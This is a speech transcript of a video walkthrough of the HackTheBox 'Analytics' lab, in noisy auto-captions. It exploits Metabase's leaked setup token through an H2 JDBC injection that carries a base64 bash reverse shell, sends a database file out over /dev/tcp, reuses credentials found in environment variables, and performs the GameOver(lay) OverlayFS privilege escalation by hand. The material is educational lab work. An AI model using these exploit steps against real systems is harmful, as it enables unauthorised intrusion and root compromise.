HackTheBox - Analytics

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what's going on YouTube this is IP doing analytics from hack the box which was a pretty easy machine if you don't care about understanding what exploits are doing because everything is just copy and paste right the foothold was in met exploit so you just discover metabase is running and you can either throw the exploit or go do some research discover how to enumerate the version and validate the exploit will work before you throw it and then once you get a shell you just look at environment variables it leaks a secret that you can use to SSH into the box which is running an out-of-date kernel and it's vulnerable to the game overlay exploit it's probably vulnerable to other things but that is the intended one and a little little while ago when this was released a lot of people are tweeting it out because the prives actually fits in a tweet you can just copy and paste the prives one lineer throw it in and you root but we're going to understand what each of these exploits are going to do and do everything manually because um I think that's where all the fun is so with that being said let's just jump in as always we get with an end map so- for defa scripts SV numerate versions OA output all formats put in the N map directory and call it analytics then the IP address of 1010 11233 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one is SSH on Port 22 and its Banner tells us it's an auntu server we also have HTTP on Port 80 it's Banner tells us engine X also running on Ubuntu and there's also a script um telling us that it forwards all requests to analytical htb so let's go ahead and add that to our host file so Pudo VC host and then we can add 10 10 11233 analytical htb and let's go browse to it so let's go 10 10 11 233 and looking at this page the first thing I want to try to identify is if I know what framework this is running is this just a static site is it WordPress jumla um what's the backend look like and this nothing really stands out we could try like um index.html we get this page we could try PHP we get not found I'm going to guess this is a static website the second thing I always look for are usernames and we could log all these if we ever have to like Brute Force users we could build a word list like J Smith airgo things like that um and then the last thing I look at is any type of place we can insert user in right so if I do um this and I'm going to click Send it's just going to redirect me back here so it's not really sending any data that's a lot of hack the Box machines and that's how you know you can kind of ignore this contact form because it just redirects you it's not sending data uh we do have analytical doc as the domain there uh we also have analytical Doom but nothing really sticks out to me if I click these links it looks like goes to the page but if I click log in we get redirected to a domain data. analytical htb so let's add this to a host file so pseudo VC host and then we can add data analytical HTP refresh and we get a page called metabase and this is I think an open source application it's not like part of their static page and the first thing I always like doing is just looking at the headers right so before we even look for exploits I just want to find more information about this so let's turn intercept on and refresh both of them so I'm going to send that to repeater did I turn intercept back on I did and let's send this to repeater so we don't want Maps fonts there we go okay I'm going to name this request homepage this one's going to be metabase I'm going to make a request on both of them and I just look at the server header so I see engine X I'm going to do here and the engine X version matches up so that tells us the same engine X um sometimes you'll see this different and if it's different it's probably going into a Docker container or just going to a different host right um this expiration is a bit odd July 3r 2001 that is an old thing normally I see old I always look for cve um I don't think the software is from 2001 I don't know exactly why that's happening um we see the date on the server and the date does match up GMT GMT sometimes you'll find the time zones different as well that points to it being a different um web server the other thing you can look at and I think this is Docker it's not going to do it but the TTL um sometimes you can identify like if there's a firewall or like um some type of router like web application firewall I'm trying to think um reverse proxy that's the word by looking at ttls right so I would also go with like TCP dump so TCP dump dasi ton Z and I can say Source port on 80 and then when we make a request to each of these so I'll make a request to the homepage we see the TTL we have to actually do a-v for verose I'm also add the DN flag so we don't do DNS we can see that response is always going to be 63 if we do it for the um data one the response is also 63 so if you don't know what TTL is this is time to live whenever it performs a network cop this decrements um I think the network cop and Docker is done through IP tables on Linux and that doesn't decrement when doing it doesn't treat it as a network despite it going from the probably like e zero adapter to the docker zero adapter to get that it just doesn't decrement the TTL so you can't fingerprint it that way but if this was a different box like we had some type of Gat and Planet redirects to different networks um this TTL would help us fingerprint that right um it's also useful for like reverse proxies I've seen this actually be a way to enumerate that one exist and you know that it exists it doesn't really help you that much but in the terms of Recon I'd rather look at that than not look at it right so let's look at metabase the first step is always to just look for any known cve so we'll go to exploit DB and you can run search plate on your local box I'm bad about keeping my stuff up to date the typical security person right so I always go to the source because I know it's going to be um up to date we have a February 15th of 2024 something was up uploaded metabase 04 6.6 so we want to see if we can get the version of metabase I'm sure if we googled around we could find it but um find someone talking about it however we could just do it manually right the first thing I always look for is just searching version in the source and Firefox is going to be weird about this like we can see it highlights this but this isn't version right here it's just like this whole wrapping is too long for Firefox to know what to do with but if we went over to curl or even burp site it would be a bit easier to read so if I curl um data. analytical htb and let's just GP for version so we see version right here date tag and we see 0466 so this exploit would work it's in met exploit which is probably what this is talking about or they're using a python one there's also exploit one but I don't think we're going to learn as much if we just run the exploit right so let's do a little bit of research make it hard for us um whenever in like ctfs I like stepping through it because you may learn like um something the creat the exploit did you learn more about it so when you're going on the hunt you find things better right if you just run the script you're not really learning if I was on the job and like time was critical I'd probably just like run the script but I'm learning here right so we Google metas bace this let's see um is this one there's an exploit analysis there we go this is what I wanted the asset note so we can close these this is a really good one that's talking about it I think these are the people that found the exploit if you didn't want to use heck the Box you could just use Docker to spin up the vulnerable version this is always a great thing to do um essentially the whole exploit revolves around you getting this setup token and I think the setup token is used um like when you first set it up it grants you access and order to um create a metabase instance and like create the default user and stuff and the SE token should be nled out but for some reason it isn't and we can access it right so it says um we can view API session properties that is accessible without off so let's go ahead and view this so I'm going to go to metabase going to make a get request here and we accessed it we have information here let's see I'm just going to search for token let's go we got two matches go to the second match and we have setup token right here so we're able to get the setup token um so we can complete the setup and through this is where rce is right here they're talking about like how it happened um eventually they landed on a commit made in January 20 22nd or 2022 and they're looking at this because when they search the internet they found a lot of the metabase servers did not have a setup token there but some of them did and it translated down to this commit in January 2022 um removed this line you can see these are in Red so they're removing that clear token so it just left a token in that config so and any metabase server stood up after that day would leak its setup key and then it can use a setup key in order to get code execution they talk about going into the H2 database driver which I think is like a SQL driver in Java maybe I don't know exactly what it is but the normal way they got code execution through the init parameter was blocked by a blacklist because um other vulnerabilities just um use this so think of this like a la bin or just a gadget chain to get rce so they blocked this one um so once they had access they were looking for other ways to execute it and they found Trace level system out would also enable um code execution so here they're talking about chaining everything together and we're not going to do this one because this is kind of just proving it I guess we could it's not getting code execution here this is their way to um prove it vulnerable so we have them using the metabase dojar and this is also interesting um they can go in the jar file and pick a sample database and they did this because they're touching a database if they screw up they can hose the database itself and take metabase down however um through this ZIP wrapper they can go in the jar and get the sample database so they're never touching the prod database so they don't risk taking it down it's always good to do that and we can see them doing this it's kind of like an SQL injection trick they say they eventually hit the system Trace out let's see where was that um right here they create the trigger and then right here they're using a Javan net URL to open a connection so this doesn't give rce it's just a way to um enumerate it is vulnerable so let's go ahead and copy this and we will control R let's change the request method I'm going to change it to application Json always modify your content type and then when we paste this and it wasn't properties right it was setup validate we're going to get a failure here because I forgot to do one thing the token so let's go ahead and grab our token uh that was right here so I'm going to grab this go over here we'll put in the token and it's hung because it's trying to reach example.com let's go to 10104 whoops let's go 101048 and let's see we could stand up a simple HTTP server but I am not I'm just going to use netcat and the reason why is I want to see all the headers that come across so I'm going to do NC lvmp 8,000 going to send this request again go here and we can see Java reaching back to us right and the whole reason I didn't do the python SMTP server or ah HTTP server is we miss a lot of the data that you get from the headers like my initial exploit I always like seeing user agent things like that right um so we have that if we keep reading the post they talk about a good way to get code execution is that this one right here zip meta database let's go here yep they're doing a Bash payload here so I'm going to copy this database line let's go here copy everything paste and this is a way to um avoid spaces right so they're doing the echo command here and the whenever there's a space in this bracket or a comma in the bracket is going to translate to that space and I think they did this because arguments are delimited by space and they did a bash d c here so instead of like dealing with um quote apocalypse because they used a single quote here and a double quote here they could probably like escape a quote right they decided let's just treat space is a bad character and avoid it which I like um we got to replace this and this is just a reverse shell so let's do Echo dasn um let's see they're calling it with bash dasi I think we just do this well they call it with Bashi so that's should be fine 8 90001 Z and one and then let's pipe it over to Bas 64 and they didn't do this I always like doing it and you're uh getting rid of any dangerous characters so let's see where is that plus there we go no plus there add a space here no plus there so now this is just pure alpha numeric it's just one thing I always like doing because that plus could screw up and waste a lot of time so we have this exploit let's listen on 901 run it it's hung and we get a connection back awesome um so it looks like it's working we don't have an actual prompt that's why I always do V because if I didn't do V there let's just show you we run uh maybe control z a few times I think I have a connection right now right I don't see anything LS I do but with the V it tells you when that connection's made which is really nice right so it doesn't send you a shell um you'll get one next time like when you type a line so let's do Python 3 import PTY PTY spawn b bash o do we have script we don't um so we can't get a proper PTY so in that case I like using RL WP just so I have my up and down arrows uh can we just type bash and get a prompt that's annoying um I'm sure we could finagle away and get it but I'm not going to waste time so let's see we're in metabase we could strings metab base. DB lsla metab base. DB let's see does this like is this a Sim link stat oh it's a directory okay and we could strings it to see if we can get like any credentials out of it um it's probably sqlite oh God that's a lot of data that was a mistake that was a big mistake okay we can file against at metabase DB move DB let's just send it it to ourselves NC lvmp 91 to metabase DB move DB uh we can cat this to Dev TCP 10148 90001 there we go and then we can file against it we just get data um the other thing want to do is try to figure out um credentials right we do lsla on slash we do know we're in a Docker environment there is app so let's go in slapp um run metabase Dosh see don't see anything there I was like looking for a configuration file right um another good thing to do when ever you're on a web server um we are the metabase user we can look at the environment and see what environment variables there are because that may also just hold the credentials if you can't find the config we don't have the DB pass the H name is probably the doc container jdk database file and we have a user and password metalytics and analytics DS 2023 so let's go ahead and try SSH um let's just copy this at 10 10 11 to 33 and then let's try this password and we get logged in awesome so now this next step is a little bit hard to find it's just one of those things you should always look at um because I don't know any good like easy automated tools to run uh maybe Linux exploit suggest to finds it and if it does then linp should find it because Lin peas Imports this let's just run it um because it's a kernel exploit and you may think like why can't they just look at the version of the Kel and know it's vulnerable right the thing is so many dros have so many versions of Colonels and they all label it somewhat differently and it's just a huge pain um to find if something's affected right because this Ubuntu let's see cat Etsy LSB release um we're on jamming if we're on focal or something like all the versions would be different like sometimes the five version's vulnerable as well as the six it it's a whole mess um you may think it's easy but like until you start looking at you realize what difficulty it is making a program that looks at a colel and identifies it's vulnerable um and maybe I'm wrong maybe it is easy but I just I remember running Linux exploit suggested once being like man I could do a better job with that and the answer was oh my God there's so many hard ways to like weird things I didn't think of when trying to do this so let's just run this so we we'll run let's see this is why you get all these old cves like we can ignore all these 2021 ones um and I don't think it found it and that may just be like it's not in the database or maybe it didn't flag correctly right we see it updated last month so let's just go with un name- a and I'm going to Google this so if we say that exploit I'm guessing we'll get the game overlay exploit right yeah we get one right here odly enough L exploit comes up um and there's a lot of hype around this vulnerability this is the one that everyone was talking about um it can fit in a tweet that you can prives right uh here's the original payload here's one adjusted Twitter uh let's see let's just run it and instead of O system ID actually make directory exploit CD exploit make dur one it'll be easier to like run multiple things this way so if I just run this boom I am rout and we can go in rout uh we should have I'm not sure why that one didn't work uh let's see upper import Os Os set uid zero OS [Music] system I wonder if it's uh I bet it's bash without the SL p or- p nope it worked that time I don't know why when I pasted it didn't work right but we don't really learn anything doing it that way just running it so let's talk about this exploit um the better one to go to is this blog post I think I talked about it in two million as well because this vulnerability is really funny and they talk about it here um essentially overlay FS is a complicated file system and I mainly know it for a Docker because what it enables you to do is lay a file system on top of another one right and you may be confused why you want to do that right so let's say you have a Docker image and you want to spawn four containers off that image you don't want to make the root file system four times because that's going to take a lot of dis space so you'd make that root file system on the lower thing and then the upper would be the changes you make to that file system and that would be your container the combination between lower and upper and that way you can use the same base directory structure for multiple containers and not take up more space because the upper directory is just tracking the changes and hopefully I didn't like mix up the two but that is my understanding of overlay FS now the vulnerability comes into play with special file attributes a long time ago um well maybe not a long time ago I think it was earlier 2023 or whenever 2 million was um when you did something with this file system the set uid bit would stick and that created a prives because when you're in the upper Nam space you can set your user to be whatever you want so you create a set uid file get it cloned over then you exit that name space and now um bash has set your ID and you can execute it as root that's bad right um they fix that but they forgot about capabilities which is another way binaries can escalate Privileges and we could um exploit it again and that's what this is so let's take a look through the exploit I think I just closed it right no we have this Twitter one we'll use this okay let's see see is that the full payload it's missing an unshare right yeah okay so the first thing it does is it's going to do unshare D RM uh this is also an argument to execute a command but we're not going to do that right away so we're just going to do unshare RM and I forget the M does the r is going to be root um let's see- M and mount so essentially this we created a root Nam space now we're not really root if I go to LS root we can't open it we're just root in the namespace we created so in this Nam space we're going to create a lower directory and upper directory I think this is a working directory and M I think is merge so we create all those and then for the sake of saving space they use all these stars but really they just want to copy Python 3 so let's do user bin Python 3 into the lower okay so now we want to set the capability of Python 3 so we're giving it the set uid capability and now we're going to perform the mount so we'll do Mount DT overlay overlay d o um remount lower directory is equal to low upper directory is equal to U work directory is equal to W and M I want to say is merge I may be wrong with that so now we created the structure and what we're going to do is we're going to touch every file in this m directory and what that's going to do is signify a change to it so the system copies it from the lower directory to the upper directory okay we've done that and oh they have to put an exit here I think so the exploit is done so now if we do Python 3 on the upper directory we execute the upper directories Python 3 we can import Os Os set uid Z and then OS system uh um bash and then LS rout so we just did that exploit manually now the really weird thing let's go back a step um if we look at this so let's just do a um lsla on upper Python 3 and lower Python 3 they look the same that's right we use capabilities not set u ID let's do a get capability lower Python 3 we have that capability upper for Python 3 so you would think I can execute this right what's going to happen if we import OS because we do see these look the same right and we do os. set uid zero operation not permitted this is really bizarre right these files have the same capability what happened here well what happened is there's a second bit that's get set and that's when the system copies it from the lower to the upper it's going to start trusting the name space and you normally can do it with like get fatter I think like that but this binary doesn't exist on a machine so in order to work around that I'm going to make a um python script and we're going to use the OS module to pretty much mimic what we wanted to do with get fatter uh so we'll import OS and then we'll say lower is = to um L Python 3 and we can say for attribute in OS list X attributes on lower then we want to get the value so we'll get X attribute on the same thing and we want to just print it so we'll print attribute value then let's do the same thing for the upper man I scripted this horribly but oh well no point of return okay Python 3 temp. Pi uh get X is missing a tribute um atdr that's what we need I think it's file than that there we go the capability is slightly different I honestly expected something a little bit different I wanted it to show me the capability that I'm missing because you can see these are definitely different um but not in a way expected let's just clean up this by putting a print lower and a print upper here so we know exactly what programs we're looking at right and we run that we have this I'm guessing if I was root maybe that would change it up but I don't know what these bits are in the security capability and that may be what is screwing it up so it's either those bits are important and I don't know how to read this or let's do U Python 3 import Os Os set u id0 OS system BH and we can exploit or run this again and that's what did it um we also have a trusted overlay origin bit so it's either this or the file having this and these bits say hey don't trust this capability it came from overlay f don't know what that is or maybe it's this saying um use the permission bit in the overlay system and that's how it gets the root user really don't know exactly why but the main goal here was just showing you that sometimes your tools lie and when you do like the um was it get fle or get cap yeah it was get cap U Python 3 l python three like they look the same but when you look at them more in depth you can see they're different so that's going to be the Box hopefully you learned a little bit about the overlay FS uh exploit and metabase and enjoy the video take care and I'll see you all next time
Info
Channel: IppSec
Views: 11,573
Rating: undefined out of 5
Keywords:
Id: p1NsQSGeDv0
Channel Id: undefined
Length: 32min 44sec (1964 seconds)
Published: Sat Mar 23 2024
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.